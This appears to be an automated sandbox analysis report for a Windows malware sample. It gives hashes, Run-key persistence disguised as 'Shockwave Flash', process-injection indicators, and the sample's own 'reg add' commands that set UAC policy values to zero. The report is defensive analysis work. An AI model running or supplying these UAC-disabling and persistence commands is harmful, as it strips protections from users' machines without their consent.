Analysis
-
max time kernel
10s -
max time network
122s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
20/08/2021, 15:54
Static task
static1
Behavioral task
behavioral1
Sample
sample.exe
Resource
win7v20210410
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
sample.exe
Resource
win10v20210408
0 signatures
0 seconds
General
-
Target
sample.exe
-
Size
158KB
-
MD5
56f67d720e83f2cff38f2ea1d9c8f9ff
-
SHA1
9c9cd7cd4fef7452eed6c4aba14ead4c389a8d78
-
SHA256
5b9fee8a999bd50608b7204a499770f8070bec7af20b3607af29ff3ed768639c
-
SHA512
527623d086597f54691e624a6c91fbe86958a78738c507b9c0097337262bb72a728a75f828dd173d2b9ea7861c5968232dc7e5d36a83d4ee3d7b5bbf42a79e3f
Score
10/10
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\Admin = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Admin.exe" sample.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\Shockwave Flash = "C:\\Users\\Admin\\AppData\\Local\\Temp\\sample.exe" sample.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 1444 reg.exe 1600 reg.exe 1644 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe 1048 sample.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1048 sample.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1048 wrote to memory of 1964 1048 sample.exe 26 PID 1048 wrote to memory of 1964 1048 sample.exe 26 PID 1048 wrote to memory of 1964 1048 sample.exe 26 PID 1048 wrote to memory of 1284 1048 sample.exe 27 PID 1048 wrote to memory of 1284 1048 sample.exe 27 PID 1048 wrote to memory of 1284 1048 sample.exe 27 PID 1048 wrote to memory of 1728 1048 sample.exe 28 PID 1048 wrote to memory of 1728 1048 sample.exe 28 PID 1048 wrote to memory of 1728 1048 sample.exe 28 PID 1964 wrote to memory of 1444 1964 cmd.exe 32 PID 1964 wrote to memory of 1444 1964 cmd.exe 32 PID 1964 wrote to memory of 1444 1964 cmd.exe 32 PID 1728 wrote to memory of 1644 1728 cmd.exe 35 PID 1728 wrote to memory of 1644 1728 cmd.exe 35 PID 1728 wrote to memory of 1644 1728 cmd.exe 35 PID 1284 wrote to memory of 1600 1284 cmd.exe 33 PID 1284 wrote to memory of 1600 1284 cmd.exe 33 PID 1284 wrote to memory of 1600 1284 cmd.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\sample.exe"C:\Users\Admin\AppData\Local\Temp\sample.exe"1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\system32\cmd.execmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- Modifies registry key
PID:1444
-
-
-
C:\Windows\system32\cmd.execmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm / v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\system32\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm / v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f3⤵
- Modifies registry key
PID:1600
-
-
-
C:\Windows\system32\cmd.execmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\system32\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Modifies registry key
PID:1644
-
-
-
C:\Users\Admin\Desktop\Admin.exe"C:\Users\Admin\Desktop\Admin.exe"1⤵PID:828
-
C:\Windows\system32\cmd.execmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f2⤵PID:1372
-
-
C:\Windows\system32\cmd.execmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm / v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f2⤵PID:1860
-
-
C:\Windows\system32\cmd.execmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm /v EnableLUA /t REG_DWORD /d 0 /f2⤵PID:1712
-
-
C:\Users\Admin\Desktop\Admin.exe"C:\Users\Admin\Desktop\Admin.exe"1⤵PID:884
-
C:\Windows\system32\cmd.execmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm /v EnableLUA /t REG_DWORD /d 0 /f2⤵PID:1576
-
-
C:\Windows\system32\cmd.execmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm / v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f2⤵PID:672
-
-
C:\Windows\system32\cmd.execmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f2⤵PID:528
-
-
C:\Users\Admin\Desktop\Admin.exe"C:\Users\Admin\Desktop\Admin.exe"1⤵PID:1712
-
C:\Windows\system32\cmd.execmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm /v EnableLUA /t REG_DWORD /d 0 /f2⤵PID:2024
-
-
C:\Windows\system32\cmd.execmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm / v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f2⤵PID:1824
-
-
C:\Windows\system32\cmd.execmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f2⤵PID:1228
-